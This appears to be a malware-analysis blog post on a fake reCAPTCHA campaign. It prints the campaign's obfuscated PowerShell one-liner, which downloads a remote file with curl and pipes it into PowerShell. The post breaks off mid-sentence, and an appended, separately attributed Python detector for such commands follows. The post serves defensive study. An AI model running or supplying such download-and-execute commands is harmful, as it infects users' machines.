Breaking Down A Multi-Stage PowerShell Infection
AviaB's Blog · Avia Barazani · May 11, 2025 · 10 min read

Tags: Malware Analysis, PowerShell, infection-chain

Table of Contents
- Overview
- 1st Stage Analysis
  - Case-altered obfuscation
  - String splitting obfuscation
- 2nd Stage Analysis
- 3rd Stage Analysis
- Final Stage Analysis
- Summary
- Indicators Of Compromise (IOC)

Overview

Fake reCAPTCHA campaigns are nothing new in the cyber threat landscape. Despite their simplicity, these campaigns are surprisingly effective at tricking users.
The technique is straightforward: the victim is shown a fake reCAPTCHA page that instructs them to verify their identity by pasting a PowerShell command into the Windows Run dialog. This seemingly harmless action initiates the infection chain.

This article will focus on deobfuscating and analyzing the infection chain step by step, all the way to the final payload. It will also break down and explain the various techniques used by the attacker.

Here's a high-level diagram of the infection chain:

1st Stage Analysis

We can see the infamous fake reCAPTCHA page. Upon clicking "I'm not a robot," a prompt pops up, providing us with clear instructions regarding the "verification" process. If we follow the instructions, we notice that something is copied to our clipboard. At first glance, this doesn't appear alarming. However, when we paste the command into a text editor, we quickly realize it reveals something much different from what we initially expected.

```text
PoWERSHElL - w M "in" i "m" ized c "Url.E" X "e" - k - L -- "re" try 9 "9" 9 ht "tps:/" / "dy" b "e" p.fu "n" / "fb8" 8 "c" 1eb2 "1" d "4" f "e2" 71 "2" 723729a "d2" f "e" 7 "38.tx" t | powe "r" shell - ; " ð Access Guard: Validation. RefID: 45ab26cf05b6abc95f
```

Before we delve into the specifics of what this command does and the techniques it employs, it's crucial to first understand how this command made its way into our clipboard. Looking at the HTML source code, we can see the initialization of a new
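The clipboard command above hides its intent with two tricks: the executable names are case-altered (PoWERSHElL, cUrl.EXe) and the arguments are split into quoted fragments. Both are cosmetic: Windows paths and PowerShell parameters are case-insensitive, and the Windows argument parser strips the quotes, so a fragment such as M"in"i"m"ized reaches the program as the single argument Minimized. The following Python script is an added example, not code from the article or its author. It normalises a Run-dialog style one-liner by undoing both tricks and then flags the download-and-execute pattern (hidden window, built-in downloader, remote URL, output piped into a second PowerShell reading standard input). The sample command is constructed to mirror the shape of the one on the page; its domain and path are placeholders, not the campaign's real URL.

```python
import re

# Constructed sample in the same shape as the article's clipboard command:
# case-altered PowerShell, quote-split arguments, curl fetching a text file
# and piping it into a second PowerShell that reads its script from stdin.
# The host and path are placeholders (example.invalid), not the real IoC.
SAMPLE = ('PoWERSHElL -w M"in"i"m"ized c"Url.E"X"e" -k -L --"re"try 9"9"9 '
          'ht"tps:/"/exa"mp"le.invalid/pay"lo"ad.txt | powe"r"shell -')

# One double-quoted fragment. The Windows argument parser removes the quotes,
# so a"b"c is delivered to the program as the single argument abc.
QUOTE_FRAGMENT = re.compile(r'"([^"]*)"')

# Built-in tools commonly used to fetch a second stage.
DOWNLOADERS = ("curl.exe", "curl ", "iwr ", "invoke-webrequest", "certutil")

# Downloaded content handed straight to an interpreter. A trailing bare "-"
# after powershell makes it read the script from standard input.
EXECUTORS = re.compile(r"\|\s*powershell(?:\.exe)?\s+-(?:\s|$)|\biex\b|invoke-expression|\bmshta\b")


def deobfuscate(command: str) -> str:
    """Undo string splitting: glue quoted fragments back onto their neighbours.

    Case is kept here so the result is still the command the host would run
    (curl's -L and -l, for instance, are different flags).
    """
    joined = QUOTE_FRAGMENT.sub(lambda m: m.group(1), command)
    return re.sub(r"\s+", " ", joined).strip()


def normalize(command: str) -> str:
    """Deobfuscate and lower-case; this form is only used for matching."""
    return deobfuscate(command).lower()


def classify(command: str) -> dict:
    """Return the deobfuscated command and the reasons it looks suspicious."""
    clean = deobfuscate(command)
    norm = clean.lower()
    reasons = []
    if re.search(r"\s-w(?:indowstyle)?\s+(?:hidden|minimized)\b", norm):
        reasons.append("PowerShell started with a hidden or minimized window")
    if any(tool in norm for tool in DOWNLOADERS):
        reasons.append("built-in downloader invoked")
    if re.search(r"https?://", norm):
        reasons.append("remote URL embedded in the command")
    if EXECUTORS.search(norm):
        reasons.append("downloaded content handed to an interpreter")
    fragments = len(QUOTE_FRAGMENT.findall(command))
    if fragments >= 3:
        reasons.append(f"arguments split across {fragments} quoted fragments")
    # Two independent indicators are enough to flag; a lone URL or a lone
    # curl call is common in legitimate admin use.
    return {"deobfuscated": clean, "normalized": norm,
            "reasons": reasons, "suspicious": len(reasons) >= 2}


if __name__ == "__main__":
    for cmd in (SAMPLE, r"notepad.exe C:\notes.txt"):
        result = classify(cmd)
        print(result["deobfuscated"])
        print("  suspicious:", result["suspicious"])
        for reason in result["reasons"]:
            print("  -", reason)
```

The same normaliser can be run over values recorded in the user's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which the Run dialog populates, or over process-creation telemetry, so that quote-split and case-altered variants of the same chain collapse to one string before any keyword or URL matching is applied.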